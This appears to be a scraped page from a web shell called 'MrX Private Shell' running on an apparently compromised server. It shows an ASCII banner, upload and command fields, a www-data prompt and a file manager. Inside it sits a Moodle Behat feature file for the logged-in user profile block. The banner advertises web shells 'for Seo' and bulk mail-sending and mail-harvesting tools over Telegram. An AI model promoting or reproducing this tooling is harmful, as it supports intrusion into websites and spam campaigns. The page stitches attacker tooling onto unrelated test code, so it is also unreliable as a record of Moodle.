__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
@block @block_myprofile
Feature: The logged in user block allows users to view their profile information on the front page
  In order to enable the logged in user block on the frontpage
  As an admin
  I can add the logged in user block to the frontpage and view my information

  Background:
    Given the following "users" exist:
      | username | firstname | lastname | email                | idnumber |
      | teacher1 | Teacher   | One      | teacher1@example.com | T1       |
    And the following "blocks" exist:
      | blockname | contextlevel | reference | pagetypepattern | defaultregion |
      | myprofile | System       | 1         | site-index      | side-pre      |

  Scenario: Try to view the logged in user block as a guest
    Given I log in as "guest"
    When I am on site homepage
    Then I should not see "Logged in user"

  Scenario: View the logged in user block by a logged in user
    Given I log in as "teacher1"
    When I am on site homepage
    Then I should see "Teacher One" in the "Logged in user" "block"

Filemanager

Name Type Size Permission Actions
block_myprofile.feature File 11.71 KB 0777
block_myprofile_activity.feature File 1.26 KB 0777
block_myprofile_course.feature File 954 B 0777
block_myprofile_dashboard.feature File 691 B 0777
block_myprofile_frontpage.feature File 1.02 KB 0777
Filemanager